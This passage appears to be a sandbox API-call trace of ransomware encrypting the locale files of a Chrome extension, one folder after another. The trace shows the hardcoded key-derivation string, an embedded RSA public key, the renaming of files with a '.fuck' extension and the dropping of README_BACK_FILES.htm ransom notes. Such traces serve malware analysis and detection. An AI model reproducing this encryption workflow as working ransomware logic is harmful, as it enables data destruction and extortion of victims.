CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.477] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.477] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.478] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986ed8) returned 1 [0253.478] CryptImportPublicKeyInfo (in: hCryptProv=0x2986ed8, dwCertEncodingType=0x1, pInfo=0x29955c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29955f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29955f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985260) returned 1 [0253.478] CryptEncrypt (in: hKey=0x2985260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.478] CryptEncrypt (in: hKey=0x2985260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986988*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986988*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.478] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2986988*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986988*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.480] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd5, lpOverlapped=0x0) returned 1 [0253.482] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.482] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.482] CloseHandle (hObject=0x5d60) returned 1 [0253.482] CloseHandle (hObject=0x5d5c) returned 1 [0253.483] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0253.485] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0253.486] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0253.487] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0253.488] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.488] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.488] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.488] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.488] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.489] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0253.489] AreFileApisANSI () returned 1 [0253.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0253.489] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.489] GetFileType (hFile=0x5d50) returned 0x1 [0253.490] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.491] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.491] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.491] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.491] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.491] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.492] GetLastError () returned 0x0 [0253.492] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json")) returned 0x20 [0253.492] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0253.492] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.493] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.494] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.494] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.496] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.496] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.496] CryptHashData (hHash=0x29846a0, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.496] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.497] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.497] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.497] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29862a0) returned 1 [0253.497] CryptImportPublicKeyInfo (in: hCryptProv=0x29862a0, dwCertEncodingType=0x1, pInfo=0x2994c00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994c30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994c38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985320) returned 1 [0253.497] CryptEncrypt (in: hKey=0x2985320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.497] CryptEncrypt (in: hKey=0x2985320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986f60*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986f60*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.497] WriteFile (in: hFile=0x5d60, lpBuffer=0x2986f60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986f60*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.498] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe6, lpOverlapped=0x0) returned 1 [0253.499] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.499] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.499] CloseHandle (hObject=0x5d5c) returned 1 [0253.500] CloseHandle (hObject=0x5d60) returned 1 [0253.500] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0253.503] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0253.503] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0253.505] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0253.506] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.506] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.506] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.506] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.506] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.507] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0253.507] AreFileApisANSI () returned 1 [0253.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0253.507] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.508] GetFileType (hFile=0x5d50) returned 0x1 [0253.508] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.509] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.509] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.509] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.509] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.509] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.509] GetLastError () returned 0x0 [0253.509] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json")) returned 0x20 [0253.510] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0253.511] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.511] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.512] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.513] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.514] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.514] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.514] CryptHashData (hHash=0x29846a0, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.514] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.514] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.515] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.515] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2987070) returned 1 [0253.515] CryptImportPublicKeyInfo (in: hCryptProv=0x2987070, dwCertEncodingType=0x1, pInfo=0x29948c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29948f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29948f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985760) returned 1 [0253.515] CryptEncrypt (in: hKey=0x2985760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.515] CryptEncrypt (in: hKey=0x2985760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987e40*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987e40*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.515] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2987e40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987e40*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.516] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe2, lpOverlapped=0x0) returned 1 [0253.517] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.518] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.518] CloseHandle (hObject=0x5d60) returned 1 [0253.518] CloseHandle (hObject=0x5d5c) returned 1 [0253.518] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 